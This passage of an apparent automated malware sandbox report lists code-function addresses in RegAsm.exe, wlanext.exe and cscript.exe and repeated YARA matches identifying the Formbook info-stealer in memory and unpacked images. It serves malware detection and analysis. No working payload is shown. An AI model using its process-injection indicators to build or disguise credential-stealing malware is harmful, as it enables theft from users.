          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BD88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030CFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03034120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030EE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030420A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030EDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03036E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03010D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03042581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DD466
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_00B6FF88
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_00B6F37F
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_02CC04E1
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_02CC04F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B99F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CB27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041C53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041BD88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FA23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F9CB4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FCE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F14120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F16E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FCDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F22581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037BCB4F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037C23E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0374ABD8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037DDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0374EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0374138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373B236
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037CFA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D4AEF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03734120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0371F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037399BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373A830
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037EE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037420A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0372B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037EDFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03736E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037DD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03710D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0372D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03742581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D2D82
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373B477
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037DD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0372841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D4496
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325CB27
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B954
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B998
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03242FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325C53B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03242D88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325BD88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03242D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03248C2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03248C30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BB477
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04854496
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047A841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485D466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04852D82
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04790D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048625DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04862D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047AD5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04861D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04841EB6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04862EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B5600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485D616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486DFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04861FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048620A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BA830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048628EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04851002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486E824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047AB090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B4120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0479F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B99BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048622AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BB236
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04854AEF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0484FA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BAB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485DBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048503DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048423E3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BA309
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CABD8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04862B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0483CB4F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BEB9A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C138B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297CB27
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297B998
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297B954
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02962FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02968C30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02968C2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02962D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02962D88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297BD88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297C53B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0371B150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02EFB150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0301B150 appears 48 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00419F30 appears 42 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041A060 appears 50 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0479B150 appears 145 times
          Source: NQQWym075C.exe, 00000004.00000002.498473507.0000000005F80000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenbqzOvmZAbSHtViT.bounce.exe4 vs NQQWym075C.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
